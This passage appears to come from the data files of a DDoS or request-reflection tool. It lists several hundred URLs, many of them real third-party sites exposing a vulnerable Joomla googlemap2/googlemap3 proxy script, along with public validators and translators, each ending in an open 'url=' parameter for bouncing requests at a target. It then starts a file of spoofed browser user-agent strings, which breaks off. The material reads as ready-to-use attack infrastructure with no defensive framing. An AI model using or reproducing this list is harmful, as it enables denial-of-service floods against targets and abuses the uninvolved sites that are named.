http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= 242 | http://validator.w3.org/check?uri= 243 | http://jigsaw.w3.org/css-validator/validator?uri= 244 | http://validator.w3.org/checklink?uri= 245 | http://www.w3.org/RDF/Validator/ARPServlet?URI= 246 | http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile= 247 | http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= 248 | http://validator.w3.org/mobile/check?docAddr= 249 | http://validator.w3.org/p3p/20020128/p3p.pl?uri= 250 | http://online.htmlvalidator.com/php/onlinevallite.php?url= 251 | http://feedvalidator.org/check.cgi?url= 252 | http://gmodules.com/ig/creator?url= 253 | http://www.google.com/ig/adde?moduleurl= 254 | http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= 255 | http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= 256 | http://host-tracker.com/check_page/?furl= 257 | http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= 258 | http://www.onlinewebcheck.com/check.php?url= 259 | http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= 260 | http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= 261 | http://about42.nl/www/showheaders.php;POST;about42.nl.txt 262 | http://browsershots.org;POST;browsershots.org.txt 263 | http://streamitwebseries.twww.tv/proxy.php?url= 264 | http://www.comicgeekspeak.com/proxy.php?url= 265 | http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url= 266 | http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url= 267 | http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url= 268 | http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url= 269 | http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url= 270 | http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url= 271 | http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 272 | http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 273 | http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url= 274 | http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url= 275 | http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url= 276 | http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url= 277 | http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url= 278 | http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url= 279 | http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url= 280 | http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url= 281 | http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url= 282 | http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url= 283 | http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url= 284 | http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url= 285 | http://www.gaston-schul.nl/FR/plugins/content/plugin_googlemap2_proxy.php?url= 286 | http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 287 | http://www.gilmeuble.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= 288 | http://www.hortonmccormick.com/cms/plugins/content/plugin_googlemap2_proxy.php?url= 289 | http://www.kanzlei-berendes.de/homepage/plugins/content/plugin_googlemap2_proxy.php?url= 290 | http://www.kita-spielhaus.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 291 | http://www.lacasaencarilo.com.ar/sitio/plugins/content/plugin_googlemap2_proxy.php?url= 292 | http://www.losaromos-spa.com.ar/cms/plugins/content/plugin_googlemap2_proxy.php?url= 293 | http://www.losaromos-spa.com.ar/~losaromo/cms/plugins/content/plugin_googlemap2_proxy.php?url= 294 | http://www.nickclift.co.uk/web/plugins/content/plugin_googlemap2_proxy.php?url= 295 | http://www.palagini.it/palagini/plugins/content/plugin_googlemap2_proxy.php?url= 296 | http://www.parsifaldisco.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 297 | http://www.podosys.com/csm/plugins/content/plugin_googlemap2_proxy.php?url= 298 | http://www.renault-windisch.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 299 | http://www.riegler-dorner.at/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 300 | http://www.seevilla-dr-sturm.at/cms/plugins/content/plugin_googlemap2_proxy.php?url= 301 | http://www.sounders.es/plugins/content/plugin_googlemap2_proxy.php?url= 302 | http://www.suelcasa.com/suelcasa/plugins/content/plugin_googlemap2_proxy.php?url= 303 | http://www.tcl.lu/Site/plugins/content/plugin_googlemap2_proxy.php?url= 304 | http://www.tijssen-staal.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 305 | http://www.triatarim.com.tr/TriaEn/plugins/content/plugin_googlemap2_proxy.php?url= 306 | http://www.tus-haltern.de/site/plugins/content/plugin_googlemap2_proxy.php?url= 307 | http://www.vm-esslingen.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 308 | http://www.zahnarzt-buhl.de/praxis/plugins/content/plugin_googlemap2_proxy.php?url= 309 | http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 310 | http://www.bergenpol.com/cms//plugins/content/plugin_googlemap2_proxy.php?url= 311 | http://www.arantzabelaikastola.com/webgunea//plugins/content/plugin_googlemap2_proxy.php?url= 312 | http://www.fare-furore.com/plugins/content/plugin_googlemap2_proxy.php?url= 313 | http://www.dog-ryusen.com/plugins/system/plugin_googlemap2_proxy.php?url= 314 | http://www.spvgg-roedersheim.de/web/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 315 | http://www.dahlnet.no/v2/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 316 | http://ping-admin.ru/index.sema;POST;ping-admin.ru.txt 317 | http://web-sniffer.net/?url= 318 | http://sova-tour.com.ua/plugins/system/plugin_googlemap2_proxy.php?url= 319 | http://scu-oldesloe.de/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 320 | http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url= 321 | http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url= 322 | http://translate.yandex.net/tr-url/ru-uk.uk/ 323 | http://www.bongert.lu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 324 | http://laresmadrid.org/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 325 | http://doleorganic.com/plugins/content/plugin_googlemap2_proxy.php?url= 326 | http://crawfordlivestock.com/plugins/system/plugin_googlemap2_proxy.php?url= 327 | http://www.aculaval.com/joomla/plugins/system/plugin_googlemap2_proxy.php?url= 328 | http://grandsultansaloon.com/plugins/system/plugin_googlemap2_proxy.php?url= 329 | http://www.d1010449.cp.blacknight.com/cpr.ie/plugins/content/plugin_googlemap2_proxy.php?url= 330 | http://www.architettaresas.it/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 331 | http://basketgbkoekelare.be/plugins/content/plugin_googlemap2_proxy.php?url= 332 | http://www.arbitresmultisports.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 333 | http://mobilrecord.com/plugins/content/plugin_googlemap2_proxy.php?url= 334 | http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 335 | http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 336 | http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url= 337 | http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url= 338 | http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url= 339 | http://www.bus-reichert.eu/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 340 | http://www.maxxxi.ru/plugins/system/plugin_googlemap2_proxy.php?url= 341 | http://potholepeople.co.nz/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 342 | http://www.hammondgolf.com/plugins/system/plugin_googlemap2_proxy.php?url= 343 | http://www.footgoal33.com/plugins/content/plugin_googlemap2_proxy.php?url= 344 | http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url= 345 | http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 346 | http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url= 347 | http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url= 348 | http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url= 349 | http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url= 350 | http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 351 | http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 352 | http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 353 | http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url= 354 | http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 355 | http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 356 | http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url= 357 | http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 358 | http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url= 359 | http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 360 | http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS 361 | http://lavori.joomlaskin.it/italyhotels/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 362 | http://santaclaradelmar.com/hoteles/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 363 | http://www.authentic-luxe-locations.com/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 364 | http://www.keenecinemas.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 365 | http://www.hotelmonyoli.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 366 | http://prosperitydrug.com/plugins/content/plugin_googlemap2_proxy.php?url= 367 | http://policlinicamonteabraao.com/plugins/content/plugin_googlemap2_proxy.php?url= 368 | http://www.vetreriafasanese.com/plugins/system/plugin_googlemap2_proxy.php?url= 369 | http://www.benawifi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 370 | http://www.valleyview.sa.edu.au/plugins/system/plugin_googlemap2_proxy.php?url= 371 | http://www.racersedgekarting.com/plugins/content/plugin_googlemap2_proxy.php?url= 372 | http://www.minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url=?url= 373 | http://www.villamagnoliarelais.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 374 | http://worldwide-trips.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 375 | http://systemnet.com.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 376 | http://www.netacad.lviv.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 377 | http://www.veloclub.ru/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 378 | http://www.virtualsoft.pl/plugins/content/plugin_googlemap3_proxy.php?url= 379 | http://gminazdzieszowice.pl/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 380 | http://fets3.freetranslation.com/?Language=English%2FSpanish&Sequence=core&Url= 381 | http://www.fare-furore.com/com-line/plugins/content/plugin_googlemap2_proxy.php?url= 382 | http://www.rotisseriesalaberry.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 383 | http://www.lbajoinery.com.au/plugins/content/plugin_googlemap2_proxy.php?url= 384 | http://www.seebybike.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 385 | http://www.copiflash.com/plugins/content/plugin_googlemap2_proxy.php?url= 386 | http://suttoncenterstore.com/plugins/system/plugin_googlemap2_proxy.php?url= 387 | http://coastalcenter.net/plugins/system/plugin_googlemap2_proxy.php?url= 388 | http://whitehousesurgery.org/plugins/content/plugin_googlemap2_proxy.php?url= 389 | http://www.vertexi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 390 | http://www.owl.cat/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 391 | http://www.sizzlebistro.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 392 | http://thebluepine.com/plugins/system/plugin_googlemap2_proxy.php?url= 393 | http://donellis.ie/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 394 | http://validator.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= 395 | http://validator.w3.org/nu/?doc= 396 | http://check-host.net/check-http?host= 397 | http://www.netvibes.com/subscribe.php?url= 398 | http://www-test.cisel.ch/web/plugins/content/plugin_googlemap2_proxy.php?url= 399 | http://www.sistem5.net/ww/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 400 | http://www.fmradiom.hu/palosvorosmart/plugins/content/plugin_googlemap2_proxy.php?url= 401 | http://www.iguassusoft.com/site/plugins/content/plugin_googlemap2_proxy.php?url= 402 | http://lab.univ-batna.dz/lea/plugins/system/plugin_googlemap2_proxy.php?url= 403 | http://www.computerpoint3.it/cp3/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 404 | http://hotel-veles.com/plugins/content/plugin_googlemap2_proxy.php?url= 405 | http://klaassienatuinstra.nl/plugins/content/plugin_googlemap2_proxy.php?url= 406 | http://www.google.com/ig/add?feedurl= 407 | http://anonymouse.org/cgi-bin/anon-www.cgi/ 408 | http://www.google.com/translate?u= 409 | http://translate.google.com/translate?u= 410 | http://validator.w3.org/feed/check.cgi?url= 411 | http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= 412 | http://validator.w3.org/check?uri= 413 | http://jigsaw.w3.org/css-validator/validator?uri= 414 | http://validator.w3.org/checklink?uri= 415 | http://qa-dev.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= 416 | http://www.w3.org/RDF/Validator/ARPServlet?URI= 417 | http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile= 418 | http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= 419 | http://www.w3.org/services/tidy?docAddr= 420 | http://validator.w3.org/mobile/check?docAddr= 421 | http://validator.w3.org/p3p/20020128/p3p.pl?uri= 422 | http://validator.w3.org/p3p/20020128/policy.pl?uri= 423 | http://online.htmlvalidator.com/php/onlinevallite.php?url= 424 | http://feedvalidator.org/check.cgi?url= 425 | http://gmodules.com/ig/creator?url= 426 | http://www.google.com/ig/adde?moduleurl= 427 | http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= 428 | http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= 429 | http://host-tracker.com/check_page/?furl= 430 | http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= 431 | http://www.viewdns.info/ismysitedown/?domain= 432 | http://www.onlinewebcheck.com/check.php?url= 433 | http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= 434 | http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= 435 | http://about42.nl/www/showheaders.php;POST;about42.nl.txt 436 | http://browsershots.org;POST;browsershots.org.txt 437 | http://streamitwebseries.twww.tv/proxy.php?url= 438 | http://www.comicgeekspeak.com/proxy.php?url= 439 | http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url= 440 | http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url= 441 | http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url= 442 | http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url= 443 | http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url= 444 | http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url= 445 | http://ijzerhandeljanssen.nl/web/plugins/content/plugin_googlemap2_proxy.php?url= 446 | http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 447 | http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 448 | http://link2europe.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 449 | http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url= 450 | http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url= 451 | http://peelmc.ca/plugins/content/plugin_googlemap2_proxy.php?url= 452 | http://s2p.lt/main/plugins/content/plugin_googlemap2_proxy.php?url= 453 | http://smartonecity.com/pt/plugins/content/plugin_googlemap2_proxy.php?url= 454 | http://snelderssport.nl/web/plugins/content/plugin_googlemap2_proxy.php?url= 455 | http://sunnyhillsassistedliving.com/plugins/content/plugin_googlemap2_proxy.php?url= 456 | http://thevintagechurch.com/www2/index.php?url=/plugins/content/plugin_googlemap2_proxy.php?url= 457 | http://www.abc-haus.ch/reinigung/plugins/content/plugin_googlemap2_proxy.php?url= 458 | http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url= 459 | http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url= 460 | http://www.alhambrahotel.net/site/plugins/content/plugin_googlemap2_proxy.php?url= 461 | http://www.aliento.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= 462 | http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url= 463 | http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url= 464 | http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url= 465 | http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url= 466 | http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url= 467 | http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url= 468 | http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url= 469 | http://www.fotorima.com/rima/site2/plugins/content/plugin_googlemap2_proxy.php?url= 470 | http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url= 471 | http://www.gaston-schul.nl/FR/plugins/content/plugin_googlemap2_proxy.php?url= 472 | http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 473 | http://www.gilmeuble.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= 474 | http://www.hortonmccormick.com/cms/plugins/content/plugin_googlemap2_proxy.php?url= 475 | http://www.icel.be/cms/plugins/content/plugin_googlemap2_proxy.php?url= 476 | http://www.idea-designer.com/idea/plugins/content/plugin_googlemap2_proxy.php?url= 477 | http://www.jana-wagenknecht.de/wcms/plugins/content/plugin_googlemap2_proxy.php?url= 478 | http://www.kanzlei-berendes.de/homepage/plugins/content/plugin_googlemap2_proxy.php?url= 479 | http://www.kita-spielhaus.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 480 | http://www.kjg-hemer.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 481 | http://www.labonnevie-guesthouse-jersey.com/site/plugins/content/plugin_googlemap2_proxy.php?url= 482 | http://www.lacasaencarilo.com.ar/sitio/plugins/content/plugin_googlemap2_proxy.php?url= 483 | http://www.losaromos-spa.com.ar/cms/plugins/content/plugin_googlemap2_proxy.php?url= 484 | http://www.losaromos-spa.com.ar/~losaromo/cms/plugins/content/plugin_googlemap2_proxy.php?url= 485 | http://www.nickclift.co.uk/web/plugins/content/plugin_googlemap2_proxy.php?url= 486 | http://www.oliebollen.me/plugins/content/plugin_googlemap2_proxy.php?url= 487 | http://www.palagini.it/palagini/plugins/content/plugin_googlemap2_proxy.php?url= 488 | http://www.paro-nl.com/v2/plugins/content/plugin_googlemap2_proxy.php?url= 489 | http://www.parsifaldisco.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 490 | http://www.podosys.com/csm/plugins/content/plugin_googlemap2_proxy.php?url= 491 | http://www.precak.sk/penzion/plugins/content/plugin_googlemap2_proxy.php?url= 492 | http://www.pyrenees-cerdagne.com/plugins/content/plugin_googlemap2_proxy.php?url= 493 | http://www.renault-windisch.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 494 | http://www.rethinkingjournalism.com/plugins/content/plugin_googlemap2_proxy.php?url= 495 | http://www.riegler-dorner.at/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 496 | http://www.sealyham.sk/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 497 | http://www.seevilla-dr-sturm.at/cms/plugins/content/plugin_googlemap2_proxy.php?url= 498 | http://www.siroki.it/newsite/plugins/content/plugin_googlemap2_proxy.php?url= 499 | http://www.sounders.es/plugins/content/plugin_googlemap2_proxy.php?url= 500 | http://www.suelcasa.com/suelcasa/plugins/content/plugin_googlemap2_proxy.php?url= 501 | http://www.tcl.lu/Site/plugins/content/plugin_googlemap2_proxy.php?url= 502 | http://www.tijssen-staal.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 503 | http://www.triatarim.com.tr/TriaEn/plugins/content/plugin_googlemap2_proxy.php?url= 504 | http://www.tus-haltern.de/site/plugins/content/plugin_googlemap2_proxy.php?url= 505 | http://www.uchlhr.com/plugins/content/plugin_googlemap2_proxy.php?url= 506 | http://www.virmcc.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 507 | http://www.visitsliven.com/bg/plugins/content/plugin_googlemap2_proxy.php?url= 508 | http://www.vm-esslingen.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 509 | http://www.yigilca.gov.tr/_tr/plugins/content/plugin_googlemap2_proxy.php?url= 510 | http://www.zahnarzt-buhl.de/praxis/plugins/content/plugin_googlemap2_proxy.php?url= 511 | http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 512 | http://www.bergenpol.com/cms//plugins/content/plugin_googlemap2_proxy.php?url= 513 | http://www.arantzabelaikastola.com/webgunea//plugins/content/plugin_googlemap2_proxy.php?url= 514 | http://www.fare-furore.com/plugins/content/plugin_googlemap2_proxy.php?url= 515 | http://www.dog-ryusen.com/plugins/system/plugin_googlemap2_proxy.php?url= 516 | http://www.dunaexpert.hu/home/plugins/content/plugin_googlemap2_proxy.php?url= 517 | http://www.spvgg-roedersheim.de/web/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 518 | http://www.stephanus-web.de/joomla1015/mambots/content/plugin_googlemap2_proxy.php?url= 519 | http://www.dahlnet.no/v2/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 520 | http://ping-admin.ru/index.sema;POST;ping-admin.ru.txt 521 | http://web-sniffer.net/?url= 522 | http://www.map-mc.com/plugins/system/plugin_googlemap2_proxy.php?url= 523 | http://sova-tour.com.ua/plugins/system/plugin_googlemap2_proxy.php?url= 524 | http://diegoborba.com.br/andes/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 525 | http://karismatic.com.my/new/plugins/content/plugin_googlemap2_proxy.php?url= 526 | http://scu-oldesloe.de/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 527 | http://www.awf.co.nz/plugins/system/plugin_googlemap3_proxy.php?url= 528 | http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url= 529 | http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url= 530 | http://translate.yandex.net/tr-url/ru-uk.uk/ 531 | http://www.oldbrogue.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 532 | http://www.mcdp.eu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 533 | http://www.phimedia.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 534 | http://www.bongert.lu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 535 | http://laresmadrid.org/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 536 | http://www.epcelektrik.com/en/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 537 | http://doleorganic.com/plugins/content/plugin_googlemap2_proxy.php?url= 538 | http://crawfordlivestock.com/plugins/system/plugin_googlemap2_proxy.php?url= 539 | http://www.aculaval.com/joomla/plugins/system/plugin_googlemap2_proxy.php?url= 540 | http://grandsultansaloon.com/plugins/system/plugin_googlemap2_proxy.php?url= 541 | http://www.d1010449.cp.blacknight.com/cpr.ie/plugins/content/plugin_googlemap2_proxy.php?url= 542 | http://www.architettaresas.it/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 543 | http://basketgbkoekelare.be/plugins/content/plugin_googlemap2_proxy.php?url= 544 | http://www.arbitresmultisports.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 545 | http://mobilrecord.com/plugins/content/plugin_googlemap2_proxy.php?url= 546 | http://www.oldbrogue.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 547 | http://www.mcdp.eu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 548 | http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 549 | http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 550 | http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url= 551 | http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url= 552 | http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url= 553 | http://www.bus-reichert.eu/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 554 | http://www.maxxxi.ru/plugins/system/plugin_googlemap2_proxy.php?url= 555 | http://potholepeople.co.nz/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 556 | http://www.hammondgolf.com/plugins/system/plugin_googlemap2_proxy.php?url= 557 | http://www.footgoal33.com/plugins/content/plugin_googlemap2_proxy.php?url= 558 | http://www.printingit.ie/plugins/content/plugin_googlemap2_proxy.php?url= 559 | http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url= 560 | http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 561 | http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url= 562 | http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url= 563 | http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url= 564 | http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url= 565 | http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 566 | http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 567 | http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 568 | http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url= 569 | http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 570 | http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 571 | http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url= 572 | http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 573 | http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url= 574 | http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 575 | http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS -------------------------------------------------------------------------------- /files/useragent.txt: -------------------------------------------------------------------------------- 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 5 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 7 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 9 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 10 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) 